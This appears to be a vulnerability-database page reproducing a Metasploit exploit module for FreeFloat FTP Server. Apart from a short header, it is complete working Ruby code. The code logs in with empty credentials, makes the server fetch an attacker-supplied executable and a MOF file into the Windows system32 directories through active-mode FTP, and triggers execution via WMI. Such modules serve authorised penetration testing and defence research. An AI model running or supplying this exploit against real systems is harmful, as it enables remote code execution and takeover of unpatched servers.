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FreeFloat FTP Server Arbitrary File Upload Vulnerability

🗓️ 08 Dec 2012 00:00:00Reported by metasploitType 
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Vulnerability in FreeFloat FTP Server allows arbitrary file upload, leading to remote code execution

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##
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# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "FreeFloat FTP Server Arbitrary File Upload",
      'Description'    => %q{
          This module abuses multiple issues in FreeFloat: 1. No credential is actually
        needed to login; 2. User's default path is in C:\, and this cannot be changed;
        3. User can write to anywhere on the server's file system.  As a result of these
        poor implementations, a malicious user can just log in and then upload files,
        and let WMI (Management Instrumentation service) to execute the payload uploaded.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r', # Vulnerability discovery, Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://metasploit.com']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['FreeFloat', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Dec 7 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        # Change the default description so this option makes sense
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
      ], self.class)

    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password
  end


  def check
    connect
    disconnect

    if banner =~ /FreeFloat/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end


  def on_client_connect(cli)
    peer = "#{cli.peerhost}:#{cli.peerport}"

    case @stage
    when :exe
      print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
      cli.put(@exe)
      @stage = :mof

    when :mof
      print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
      cli.put(@mof)
    end

    cli.close
  end


  def upload(filename)
    select(nil, nil, nil, 1)

    peer = "#{rhost}:#{rport}"
    print_status("#{peer} - Trying to upload #{::File.basename(filename)}")

    conn = connect(false, datastore['VERBOSE'])

    print_status("#{peer} - Sending empty login...")

    res = send_user("", conn)
    if not res or res !~ /331/
      print_error("#{peer} - Error sending username")
      return false
    end

    res = send_pass("", conn)
    if not res or res !~ /230/
      print_error("#{peer} - Error sending password")
      return false
    end

    print_good("#{peer} - Empty authentication was successful")

    # Switch to binary mode
    print_status("#{peer} - Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: Get attacker's IP and source port
    src_ip   = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: Convert the IP and port for active mode
    src_ip   = src_ip.gsub(/\./, ',')
    src_port = "#{src_port/256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Tell the FTP server to download our file
    send_cmd(['STOR', filename], false, conn)

    disconnect(conn)
  end


  def exploit

    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
    @mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe      = generate_payload_exe
    @stage = :exe

    begin
      t = framework.threads.spawn("reqs", false) {
        # Upload our malicious executable
        u = upload(exe_name)
        # Upload the mof file
        upload(mof_name) if u
        register_file_for_cleanup("#{::File.basename(exe_name)}")
        register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
      }
      super
    ensure
      t.kill
    end
  end

end

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